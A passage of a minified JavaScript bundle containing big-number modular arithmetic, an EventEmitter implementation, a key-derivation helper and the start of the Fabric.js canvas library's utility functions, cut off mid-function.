numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},8227:Pe=>{"use strict";var ie,we="object"==typeof Reflect?Reflect:null,de=we&&"function"==typeof we.apply?we.apply:function(U,K,ee){return Function.prototype.apply.call(U,K,ee)};ie=we&&"function"==typeof we.ownKeys?we.ownKeys:Object.getOwnPropertySymbols?function(U){return Object.getOwnPropertyNames(U).concat(Object.getOwnPropertySymbols(U))}:function(U){return Object.getOwnPropertyNames(U)};var $=Number.isNaN||function(U){return U!=U};function ae(){ae.init.call(this)}Pe.exports=ae,Pe.exports.once=function w(O,U){return new Promise(function(K,ee){function se(le){O.removeListener(U,ve),ee(le)}function ve(){"function"==typeof O.removeListener&&O.removeListener("error",se),K([].slice.call(arguments))}S(O,U,ve,{once:!0}),"error"!==U&&function x(O,U,K){"function"==typeof O.on&&S(O,"error",U,K)}(O,se,{once:!0})})},ae.EventEmitter=ae,ae.prototype._events=void 0,ae.prototype._eventsCount=0,ae.prototype._maxListeners=void 0;var I=10;function Q(O){if("function"!=typeof O)throw new TypeError('The "listener" argument must be of type Function. Received type '+typeof O)}function F(O){return void 0===O._maxListeners?ae.defaultMaxListeners:O._maxListeners}function E(O,U,K,ee){var se,ve,le;if(Q(K),void 0===(ve=O._events)?(ve=O._events=Object.create(null),O._eventsCount=0):(void 0!==ve.newListener&&(O.emit("newListener",U,K.listener?K.listener:K),ve=O._events),le=ve[U]),void 0===le)le=ve[U]=K,++O._eventsCount;else if("function"==typeof le?le=ve[U]=ee?[K,le]:[le,K]:ee?le.unshift(K):le.push(K),(se=F(O))>0&&le.length>se&&!le.warned){le.warned=!0;var ye=new Error("Possible EventEmitter memory leak detected. "+le.length+" "+String(U)+" listeners added. Use emitter.setMaxListeners() to increase limit");ye.name="MaxListenersExceededWarning",ye.emitter=O,ye.type=U,ye.count=le.length,function j(O){console&&console.warn&&console.warn(O)}(ye)}return O}function g(){if(!this.fired)return this.target.removeListener(this.type,this.wrapFn),this.fired=!0,0===arguments.length?this.listener.call(this.target):this.listener.apply(this.target,arguments)}function b(O,U,K){var ee={fired:!1,wrapFn:void 0,target:O,type:U,listener:K},se=g.bind(ee);return se.listener=K,ee.wrapFn=se,se}function _(O,U,K){var ee=O._events;if(void 0===ee)return[];var se=ee[U];return void 0===se?[]:"function"==typeof se?K?[se.listener||se]:[se]:K?function D(O){for(var U=new Array(O.length),K=0;K<U.length;++K)U[K]=O[K].listener||O[K];return U}(se):M(se,se.length)}function y(O){var U=this._events;if(void 0!==U){var K=U[O];if("function"==typeof K)return 1;if(void 0!==K)return K.length}return 0}function M(O,U){for(var K=new Array(U),ee=0;ee<U;++ee)K[ee]=O[ee];return K}function S(O,U,K,ee){if("function"==typeof O.on)ee.once?O.once(U,K):O.on(U,K);else{if("function"!=typeof O.addEventListener)throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type '+typeof O);O.addEventListener(U,function se(ve){ee.once&&O.removeEventListener(U,se),K(ve)})}}Object.defineProperty(ae,"defaultMaxListeners",{enumerable:!0,get:function(){return I},set:function(O){if("number"!=typeof O||O<0||$(O))throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received '+O+".");I=O}}),ae.init=function(){(void 0===this._events||this._events===Object.getPrototypeOf(this)._events)&&(this._events=Object.create(null),this._eventsCount=0),this._maxListeners=this._maxListeners||void 0},ae.prototype.setMaxListeners=function(U){if("number"!=typeof U||U<0||$(U))throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received '+U+".");return this._maxListeners=U,this},ae.prototype.getMaxListeners=function(){return F(this)},ae.prototype.emit=function(U){for(var K=[],ee=1;ee<arguments.length;ee++)K.push(arguments[ee]);var se="error"===U,ve=this._events;if(void 0!==ve)se=se&&void 0===ve.error;else if(!se)return!1;if(se){var le;if(K.length>0&&(le=K[0]),le instanceof Error)throw le;var ye=new Error("Unhandled error."+(le?" ("+le.message+")":""));throw ye.context=le,ye}var z=ve[U];if(void 0===z)return!1;if("function"==typeof z)de(z,this,K);else{var l=z.length,f=M(z,l);for(ee=0;ee<l;++ee)de(f[ee],this,K)}return!0},ae.prototype.on=ae.prototype.addListener=function(U,K){return E(this,U,K,!1)},ae.prototype.prependListener=function(U,K){return E(this,U,K,!0)},ae.prototype.once=function(U,K){return Q(K),this.on(U,b(this,U,K)),this},ae.prototype.prependOnceListener=function(U,K){return Q(K),this.prependListener(U,b(this,U,K)),this},ae.prototype.off=ae.prototype.removeListener=function(U,K){var ee,se,ve,le,ye;if(Q(K),void 0===(se=this._events))return this;if(void 0===(ee=se[U]))return this;if(ee===K||ee.listener===K)0==--this._eventsCount?this._events=Object.create(null):(delete se[U],se.removeListener&&this.emit("removeListener",U,ee.listener||K));else if("function"!=typeof ee){for(ve=-1,le=ee.length-1;le>=0;le--)if(ee[le]===K||ee[le].listener===K){ye=ee[le].listener,ve=le;break}if(ve<0)return this;0===ve?ee.shift():function p(O,U){for(;U+1<O.length;U++)O[U]=O[U+1];O.pop()}(ee,ve),1===ee.length&&(se[U]=ee[0]),void 0!==se.removeListener&&this.emit("removeListener",U,ye||K)}return this},ae.prototype.removeAllListeners=function(U){var K,ee,se;if(void 0===(ee=this._events))return this;if(void 0===ee.removeListener)return 0===arguments.length?(this._events=Object.create(null),this._eventsCount=0):void 0!==ee[U]&&(0==--this._eventsCount?this._events=Object.create(null):delete ee[U]),this;if(0===arguments.length){var le,ve=Object.keys(ee);for(se=0;se<ve.length;++se)"removeListener"!==(le=ve[se])&&this.removeAllListeners(le);return this.removeAllListeners("removeListener"),this._events=Object.create(null),this._eventsCount=0,this}if("function"==typeof(K=ee[U]))this.removeListener(U,K);else if(void 0!==K)for(se=K.length-1;se>=0;se--)this.removeListener(U,K[se]);return this},ae.prototype.listeners=function(U){return _(this,U,!0)},ae.prototype.rawListeners=function(U){return _(this,U,!1)},ae.listenerCount=function(O,U){return"function"==typeof O.listenerCount?O.listenerCount(U):y.call(O,U)},ae.prototype.listenerCount=y,ae.prototype.eventNames=function(){return this._eventsCount>0?ie(this._events):[]}},1851:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(807);Pe.exports=function $(ae,I,Q,F){if(ie.isBuffer(ae)||(ae=ie.from(ae,"binary")),I&&(ie.isBuffer(I)||(I=ie.from(I,"binary")),8!==I.length))throw new RangeError("salt should be Buffer with 8 byte length");for(var E=Q/8,g=ie.alloc(E),b=ie.alloc(F||0),_=ie.alloc(0);E>0||F>0;){var y=new j;y.update(_),y.update(ae),I&&y.update(I),_=y.digest();var M=0;if(E>0){var p=g.length-E;M=Math.min(E,_.length),_.copy(g,p,0,M),E-=M}if(M<_.length&&F>0){var D=b.length-F,w=Math.min(F,_.length-M);_.copy(b,D,M,M+w),F-=w}}return _.fill(0),{key:g,iv:b}}},4968:(Pe,we,de)=>{var E,g,b,_,y,M,ie=de(5449).Buffer,j=j||{version:"5.2.4"};if(we.fabric=j,"undefined"!=typeof document&&"undefined"!=typeof window)j.document=document instanceof("undefined"!=typeof HTMLDocument?HTMLDocument:Document)?document:document.implementation.createHTMLDocument(""),j.window=window;else{var ae=new(de(4960).JSDOM)(decodeURIComponent("%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3C%2Fhead%3E%3Cbody%3E%3C%2Fbody%3E%3C%2Fhtml%3E"),{features:{FetchExternalResources:["img"]},resources:"usable"}).window;j.document=ae.document,j.jsdomImplForWrapper=de(6759).implForWrapper,j.nodeCanvas=de(6272).Canvas,j.window=ae,DOMParser=j.window.DOMParser}function Q(E,g){var b=E.canvas,_=g.targetCanvas,y=_.getContext("2d");y.translate(0,_.height),y.scale(1,-1),y.drawImage(b,0,b.height-_.height,_.width,_.height,0,0,_.width,_.height)}function F(E,g){var _=g.targetCanvas.getContext("2d"),y=g.destinationWidth,M=g.destinationHeight,p=y*M*4,D=new Uint8Array(this.imageBuffer,0,p),w=new Uint8ClampedArray(this.imageBuffer,0,p);E.readPixels(0,0,y,M,E.RGBA,E.UNSIGNED_BYTE,D);var x=new ImageData(w,y,M);_.putImageData(x,0,0)}j.isTouchSupported="ontouchstart"in j.window||"ontouchstart"in j.document||j.window&&j.window.navigator&&j.window.navigator.maxTouchPoints>0,j.isLikelyNode=void 0!==ie&&"undefined"==typeof window,j.SHARED_ATTRIBUTES=["display","transform","fill","fill-opacity","fill-rule","opacity","stroke","stroke-dasharray","stroke-linecap","stroke-dashoffset","stroke-linejoin","stroke-miterlimit","stroke-opacity","stroke-width","id","paint-order","vector-effect","instantiated_by_use","clip-path"],j.DPI=96,j.reNum="(?:[-+]?(?:\\d+|\\d*\\.\\d+)(?:[eE][-+]?\\d+)?)",j.commaWsp="(?:\\s+,?\\s*|,\\s*)",j.rePathCommand=/([-+]?((\d+\.\d+)|((\d+)|(\.\d+)))(?:[eE][-+]?\d+)?)/gi,j.reNonWord=/[ \n\.,;!\?\-]/,j.fontPaths={},j.iMatrix=[1,0,0,1,0,0],j.svgNS="http://www.w3.org/2000/svg",j.perfLimitSizeTotal=2097152,j.maxCacheSideLimit=4096,j.minCacheSideLimit=256,j.charWidthsCache={},j.textureSize=2048,j.disableStyleCopyPaste=!1,j.enableGLFiltering=!0,j.devicePixelRatio=j.window.devicePixelRatio||j.window.webkitDevicePixelRatio||j.window.mozDevicePixelRatio||1,j.browserShadowBlurConstant=1,j.arcToSegmentsCache={},j.boundsOfCurveCache={},j.cachesBoundsOfCurve=!0,j.forceGLPutImageData=!1,j.initFilterBackend=function(){return j.enableGLFiltering&&j.isWebglSupported&&j.isWebglSupported(j.textureSize)?(console.log("max texture size: "+j.maxTextureSize),new j.WebglFilterBackend({tileSize:j.textureSize})):j.Canvas2dFilterBackend?new j.Canvas2dFilterBackend:void 0},"undefined"!=typeof document&&"undefined"!=typeof window&&(window.fabric=j),function(){function E(p,D){if(this.__eventListeners[p]){var w=this.__eventListeners[p];D?w[w.indexOf(D)]=!1:j.util.array.fill(w,!1)}}function b(p,D){var w=function(){D.apply(this,arguments),this.off(p,w)}.bind(this);this.on(p,w)}j.Observable={fire:function M(p,D){if(!this.__eventListeners)return this;var w=this.__eventListeners[p];if(!w)return this;for(var x=0,S=w.length;x<S;x++)w[x]&&w[x].call(this,D||{});return this.__eventListeners[p]=w.filter(function(O){return!1!==O}),this},on:function g(p,D){if(this.__eventListeners||(this.__eventListeners={}),1===arguments.length)for(var w in p)this.on(w,p[w]);else this.__eventListeners[p]||(this.__eventListeners[p]=[]),this.__eventListeners[p].push(D);return this},once:function _(p,D){if(1===arguments.length)for(var w in p)b.call(this,w,p[w]);else b.call(this,p,D);return this},off:function y(p,D){if(!this.__eventListeners)return this;if(0===arguments.length)for(p in this.__eventListeners)E.call(this,p);else if(1===arguments.length&&"object"==typeof arguments[0])for(var w in p)E.call(this,w,p[w]);else E.call(this,p,D);return this}}}(),j.Collection={_objects:[],add:function(){if(this._objects.push.apply(this._objects,arguments),this._onObjectAdded)for(var E=0,g=arguments.length;E<g;E++)this._onObjectAdded(arguments[E]);return this.renderOnAddRemove&&this.requestRenderAll(),this},insertAt:function(E,g,b){var _=this._objects;return b?_[g]=E:_.splice(g,0,E),this._onObjectAdded&&this._onObjectAdded(E),this.renderOnAddRemove&&this.requestRenderAll(),this},remove:function(){for(var g,E=this._objects,b=!1,_=0,y=arguments.length;_<y;_++)-1!==(g=E.indexOf(arguments[_]))&&(b=!0,E.splice(g,1),this._onObjectRemoved&&this._onObjectRemoved(arguments[_]));return this.renderOnAddRemove&&b&&this.requestRenderAll(),this},forEachObject:function(E,g){for(var b=this.getObjects(),_=0,y=b.length;_<y;_++)E.call(g,b[_],_,b);return this},getObjects:function(E){return void 0===E?this._objects.concat():this._objects.filter(function(g){return g.type===E})},item:function(E){return this._objects[E]},isEmpty:function(){return 0===this._objects.length},size:function(){return this._objects.length},contains:function(E,g){return this._objects.indexOf(E)>-1||!!g&&this._objects.some(function(b){return"function"==typeof b.contains&&b.contains(E,!0)})},complexity:function(){return this._objects.reduce(function(E,g){return E+(g.complexity?g.complexity():0)},0)}},j.CommonMethods={_setOptions:function(E){for(var g in E)this.set(g,E[g])},_initGradient:function(E,g){E&&E.colorStops&&!(E instanceof j.Gradient)&&this.set(g,new j.Gradient(E))},_initPattern:function(E,g,b){!E||!E.source||E instanceof j.Pattern?b&&b():this.set(g,new j.Pattern(E,b))},_setObject:function(E){for(var g in E)this._set(g,E[g])},set:function(E,g){return"object"==typeof E?this._setObject(E):this._set(E,g),this},_set:function(E,g){this[E]=g},toggle:function(E){var g=this.get(E);return"boolean"==typeof g&&this.set(E,!g),this},get:function(E){return this[E]}},E=we,g=Math.sqrt,b=Math.atan2,_=Math.pow,y=Math.PI/180,M=Math.PI/2,j.util={cos:function(p){if(0===p)return 1;switch(p<0&&(p=-p),p/M){case 1:case 3:return 0;case 2:return-1}return Math.cos(p)},sin:function(p){if(0===p)return 0;var w=1;switch(p<0&&(w=-1),p/M){case 1:return w;case 2:return 0;case 3:return-w}return Math.sin(p)},removeFromArray:function(p,D){var w=p.indexOf(D);return-1!==w&&p.splice(w,1),p},getRandomInt:function(p,D){return Math.floor(Math.random()*(D-p+1))+p},degreesToRadians:function(p){return p*y},radiansToDegrees:function(p){return p/y},rotatePoint:function(p,D,w){var x=new j.Point(p.x-D.x,p.y-D.y),S=j.util.rotateVector(x,w);return new j.Point(S.x,S.y).addEquals(D)},rotateVector:function(p,D){var w=j.util.sin(D),x=j.util.cos(D);return{x:p.x*x-p.y*w,y:p.x*w+p.y*x}},createVector:function(p,D){return new j.Point(D.x-p.x,D.y-p.y)},calcAngleBetweenVectors:function(p,D){return Math.acos((p.x*D.x+p.y*D.y)/(Math.hypot(p.x,p.y)*Math.hypot(D.x,D.y)))},getHatVector:function(p){return new j.Point(p.x,p.y).multiply(1/Math.hypot(p.x,p.y))},getBisector:function(p,D,w){var x=j.util.createVector(p,D),S=j.util.createVector(p,w),O=j.util.calcAngleBetweenVectors(x,S),U=j.util.calcAngleBetweenVectors(j.util.rotateVector(x,O),S);return{vector:j.util.getHatVector(j.util.rotateVector(x,O*(0===U?1:-1)/2)),angle:O}},projectStrokeOnPoints:function(p,D,w){var x=[],S=D.strokeWidth/2,O=D.strokeUniform?new j.Point(1/D.scaleX,1/D.scaleY):new j.Point(1,1),U=function(K){var ee=S/Math.hypot(K.x,K.y);return new j.Point(K.x*ee*O.x,K.y*ee*O.y)};return p.length<=1||p.forEach(function(K,ee){var ve,le,se=new j.Point(K.x,K.y);0===ee?(le=p[ee+1],ve=w?U(j.util.createVector(le,se)).addEquals(se):p[p.length-1]):ee===p.length-1?(ve=p[ee-1],le=w?U(j.util.createVector(ve,se)).addEquals(se):p[0]):(ve=p[ee-1],le=p[ee+1]);var f,A,ye=j.util.getBisector(se,ve,le),z=ye.vector;if("miter"===D.strokeLineJoin&&(f=-S/Math.sin(ye.angle/2),A=new j.Point(z.x*f*O.x,z.y*f*O.y),Math.hypot(A.x,A.y)/S<=D.strokeMiterLimit))return x.push(se.add(A)),void x.push(se.subtract(A));f=-S*Math.SQRT2,A=new j.Point(z.x*f*O.x,z.y*f*O.y),x.push(se.add(A)),x.push(se.subtract(A))}),x},transformPoint:function(p,D,w){return w?new j.Point(D[0]*p.x+D[2]*p.y,D[1]*p.x+D[3]*p.y):new j.Point(D[0]*p.x+D[2]*p.y+D[4],D[1]*p.x+D[3]*p.y+D[5])},makeBoundingBoxFromPoints:function(p,D){if(D)for(var w=0;w<p.length;w++)p[w]=j.util.transformPoint(p[w],D);var x=[p[0].x,p[1].x,p[2].x,p[3].x],S=j.util.array.min(x),U=j.util.array.max(x)-S,K=[p[0].y,p[1].y,p[2].y,p[3].y],ee=j.util.array.min(K);return{left:S,top:ee,width:U,height:j.util.array.max(K)-ee}},invertTransform:function(p){var D=1/(p[0]*p[3]-p[1]*p[2]),w=[D*p[3],-D*p[1],-D*p[2],D*p[0]],x=j.util.transformPoint({x:p[4],y:p[5]},w,!0);return w[4]=-x.x,w[5]=-x.y,w},toFixed:function(p,D){return parseFloat(Number(p).toFixed(D))},parseUnit:function(p,D){var w=/\D{0,2}$/.exec(p),x=parseFloat(p);switch(D||(D=j.Text.DEFAULT_SVG_FONT_SIZE),w[0]){case"mm":return x*j.DPI/25.4;case"cm":return x*j.DPI/2.54;case"in":return x*j.DPI;case"pt":return x*j.DPI/72;case"pc":return x*j.DPI/72*12;case"em":return x*D;default:return x}},falseFunction:function(){return!1},getKlass:function(p,D){return p=j.util.string.camelize(p.charAt(0).toUpperCase()+p.slice(1)),j.util.resolveNamespace(D)[p]},getSvgAttributes:function(p){var D=["instantiated_by_use","style","id","class"];switch(p){case"linearGradient":D=D.concat(["x1","y1","x2","y2","gradientUnits","gradientTransform"]);break;case"radialGradient":D=D.concat(["gradientUnits","gradientTransform","cx","cy","r","fx","fy","fr"]);break;case"stop":D=D.concat(["offset","stop-color","stop-opacity"])}return D},resolveNamespace:function(p){if(!p)return j;var x,D=p.split("."),w=D.length,S=E||j.window;for(x=0;x<w;++x)S=S[D[x]];return S},loadImage:function(p,D,w,x){if(p){var S=j.util.createImage(),O=function(){D&&D.call(w,S,!1),S=S.onload=S.onerror=null};S.onload=O,S.onerror=function(){j.log("Error loading "+S.src),D&&D.call(w,null,!0),S=S.onload=S.onerror=null},0!==p.indexOf("data")&&null!=x&&(S.crossOrigin=x),"data:image/svg"===p.substring(0,14)&&(S.onload=null,j.util.loadImageInDom(S,O)),S.src=p}else D&&D.call(w,p)},loadImageInDom:function(p,D){var w=j.document.createElement("div");w.style.width=w.style.height="1px",w.style.left=w.style.top="-100%",w.style.position="absolute",w.appendChild(p),j.document.querySelector("body").appendChild(w),p.onload=function(){D(),w.parentNode.removeChild(w),w=null}},enlivenObjects:function(p,D,w,x){var S=[],O=0,U=(p=p||[]).length;function K(){++O===U&&D&&D(S.filter(function(ee){return ee}))}U?p.forEach(function(ee,se){ee&&ee.type?j.util.getKlass(ee.type,w).fromObject(ee,function(le,ye){ye||(S[se]=le),x&&x(ee,le,ye),K()}):K()}):D&&D(S)},enlivenObjectEnlivables:function(p,D,w){var x=j.Object.ENLIVEN_PROPS.filter(function(S){return!!p[S]});j.util.enlivenObjects(x.map(function(S){return p[S]}),function(S){var O={};x.forEach(function(U,K){O[U]=S[K],D&&(D[U]=S[K])}),w&&w(O)})},enlivenPatterns:function(p,D){function w(){++S===O&&D&&D(x)}var x=[],S=0,O=(p=p||[]).length;O?p.forEach(function(U,K){U&&U.source?new j.Pattern(U,function(ee){x[K]=ee,w()}):(x[K]=U,w())}):D&&D(x)},groupSVGElements:function(p,D,w){var x;return p&&1===p.length?(void 0!==w&&(p[0].sourcePath=w),p[0]):(D&&(D.width&&D.height?D.centerPoint={x:D.width/2,y:D.height/2}:(delete D.width,delete D.height)),x=new j.Group(p,D),void 0!==w&&(x.sourcePath=w),x)},populateWithProperties:function(p,D,w){if(w&&Array.isArray(w))for(var x=0,S=w.length;x<S;x++)w[x]in p&&(D[w[x]]=p[w[x]])},createCanvasElement:function(){return j.document.createElement("canvas")},copyCanvasElement:function(p){var D=j.util.createCanvasElement();return D.width=p.width,D.height=p.height,D.getContext("2d").drawImage(p,0,0),D},toDataURL:function(p,D,w){return p.toDataURL("image/"+D,w)},createImage:function(){return j.document.createElement("img")},multiplyTransformMatrices:function(p,D,w){return[p[0]*D[0]+p[2]*D[1],p[1]*D[0]+p[3]*D[1],p[0]*D[2]+p[2]*D[3],p[1]*D[2]+p[3]*D[3],w?0:p[0]*D[4]+p[2]*D[5]+p[4],w?0:p[1]*D[4]+p[3]*D[5]+p[5]]},qrDecompose:function(p){var D=b(p[1],p[0]),w=_(p[0],2)+_(p[1],2),x=g(w),S=(p[0]*p[3]-p[2]*p[1])/x,O=b(p[0]*p[2]+p[1]*p[3],w);return{angle:D/y,scaleX:x,scaleY:S,skewX:O/y,skewY:0,translateX:p[4],translateY:p[5]}},calcRotateMatrix:function(p){if(!p.angle)return j.iMatrix.concat();var D=j.util.degreesToRadians(p.angle),w=j.util.cos(D),x=j.util.sin(D);return[w,x,-x,w,0,0]},calcDimensionsMatrix:function(p){var D=void 0===p.scaleX?1:p.scaleX,w=void 0===p.scaleY?1:p.scaleY,x=[p.flipX?-D:D,0,0,p.flipY?-w:w,0,0],S=j.util.multiplyTransformMatrices,O=j.util.degreesToRadians;return p.skewX&&(x=S(x,[1,0,Math.tan(O(p.skewX)),1],!0)),p.skewY&&(x=S(x,[1,Math.tan(O(p.skewY)),0,1],!0)),x},composeMatrix:function(p){var D=[1,0,0,1,p.translateX||0,p.translateY||0],w=j.util.multiplyTransformMatrices;return p.angle&&(D=w(D,j.util.calcRotateMatrix(p))),(1!==p.scaleX||1!==p.scaleY||p.skewX||p.skewY||p.flipX||p.flipY)&&(D=w(D,j.util.calcDimensionsMatrix(p))),D},resetObjectTransform:function(p){p.scaleX=1,p.scaleY=1,p.skewX=0,p.skewY=0,p.flipX=!1,p.flipY=!1,p.rotate(0)},saveObjectTransform:function(p){return{scaleX:p.scaleX,scaleY:p.scaleY,skewX:p.skewX,skewY:p.skewY,angle:p.angle,left:p.left,flipX:p.flipX,flipY:p.flipY,top:p.top}},isTransparent:function(p,D,w,x){x>0&&(D>x?D-=x:D=0,w>x?w-=x:w=0);var O,S=!0,K=p.getImageData(D,w,2*x||1,2*x||1),ee=K.data.length;for(O=3;O<ee&&0!=(S=K.data[O]<=0);O+=4);return K=null,S},parsePreserveAspectRatioAttribute:function(p){var O,D="meet",S=p.split(" ");return S&&S.length&&("meet"!==(D=S.pop())&&"slice"!==D?(O=D,D="meet"):S.length&&(O=S.pop())),{meetOrSlice:D,alignX:"none"!==O?O.slice(1,4):"none",alignY:"none"!==O?O.slice(5,8):"none"}},clearFabricFontCache:function(p){(p=(p||"").toLowerCase())?j.charWidthsCache[p]&&delete j.charWidthsCache[p]:j.charWidthsCache={}},limitDimsByArea:function(p,D){var w=Math.sqrt(D*p),x=Math.floor(D/w);return{x:Math.floor(w),y:x}},capValue:function(p,D,w){return Math.max(p,Math.min(D,w))},findScaleToFit:function(p,D){return Math.min(D.width/p.width,D.height/p.height)},findScaleToCover:function(p,D){return Math.max(D.width/p.width,D.height/p.height)},matrixToSVG:function(p){return"matrix("+p.map(function(D){return j.util.toFixed(D,j.Object.NUM_FRACTION_DIGITS)}).join(" ")+")"},removeTransformFromObject:function(p,D){var w=j.util.invertTransform(D),x=j.util.multiplyTransformMatrices(w,p.calcOwnMatrix());j.util.applyTransformToObject(p,x)},addTransformToObject:function(p,D){j.util.applyTransformToObject(p,j.util.multiplyTransformMatrices(D,p.calcOwnMatrix()))},applyTransformToObject:function(p,D){var w=j.util.qrDecompose(D),x=new j.Point(w.translateX,w.translateY);p.flipX=!1,p.flipY=!1,p.set("scaleX",w.scaleX),p.set("scaleY",w.scaleY),p.skewX=w.skewX,p.skewY=w.skewY,p.angle=w.angle,p.setPositionByOrigin(x,"center","center")},sizeAfterTransform:function(p,D,w){var x=p/2,S=D/2,O=[{x:-x,y:-S},{x,y:-S},{x:-x,y:S},{x,y:S}],U=j.util.calcDimensionsMatrix(w),K=j.util.makeBoundingBoxFromPoints(O,U);return{x:K.width,y:K.height}},mergeClipPaths:function(p,D){var w=p,x=D;w.inverted&&!x.inverted&&(w=D,x=p),j.util.applyTransformToObject(x,j.util.multiplyTransformMatrices(j.util.invertTransform(w.calcTransformMatrix()),x.calcTransformMatrix()));var S=w.inverted&&x.inverted;return S&&(w.inverted=x.inverted=!1),new j.Group([w],{clipPath:x,inverted:S})},hasStyleChanged:function(p,D,w){return w=w||!1,p.fill!==D.fill||p.stroke!==D.stroke||p.strokeWidth!==D.strokeWidth||p.fontSize!==D.fontSize||p.fontFamily!==D.fontFamily||p.fontWeight!==D.fontWeight||p.fontStyle!==D.fontStyle||p.deltaY!==D.deltaY||w&&(p.overline!==D.overline||p.underline!==D.underline||p.linethrough!==D.linethrough)},stylesToArray:function(w,D){w=j.util.object.clone(w,!0);for(var x=D.split("\n"),S=-1,O={},U=[],K=0;K<x.length;K++)if(w[K])for(var ee=0;ee<x[K].length;ee++){S++;var se=w[K][ee];se&&(j.util.hasStyleChanged(O,se,!0)?U.push({start:S,end:S+1,style:se}):U[U.length-1].end++),O=se||{}}else S+=x[K].length;return U},stylesFromArray:function(p,D){if(!Array.isArray(p))return p;for(var w=D.split("\n"),x=-1,S=0,O={},U=0;U<w.length;U++)for(var K=0;K<w[U].length;K++)x++,p[S]&&p[S].start<=x&&x<p[S].end&&(O[U]=O[U]||{},O[U][K]=Object.assign({},p[S].style),x===p[S].end-1&&S++);return O}},function(){var E=Array.prototype.join,g={m:2,l:2,h:1,v:1,c:6,s:4,q:4,t:2,a:7},b={m:"l",M:"L"};function _(h,R,J,Z,ue,Ie,Ae,Ue,Xe,He,Be){var qe=j.util.cos(h),De=j.util.sin(h),Ve=j.util.cos(R),ze=j.util.sin(R),me=J*ue*Ve-Z*Ie*ze+Ae,Ke=Z*ue*Ve+J*Ie*ze+Ue;return["C",He+Xe*(-J*ue*De-Z*Ie*qe),Be+Xe*(-Z*ue*De+J*Ie*qe),me+Xe*(J*ue*ze+Z*Ie*Ve),Ke+Xe*(Z*ue*ze-J*Ie*Ve),me,Ke]}function M(h,R,J,Z){var ue=Math.atan2(R,h),Ie=Math.atan2(Z,J);return Ie>=ue?Ie-ue:2*Math.PI-(ue-Ie)}function D(h,R,J){for(var Be=function y(h,R,J,Z,ue,Ie,Ae){var 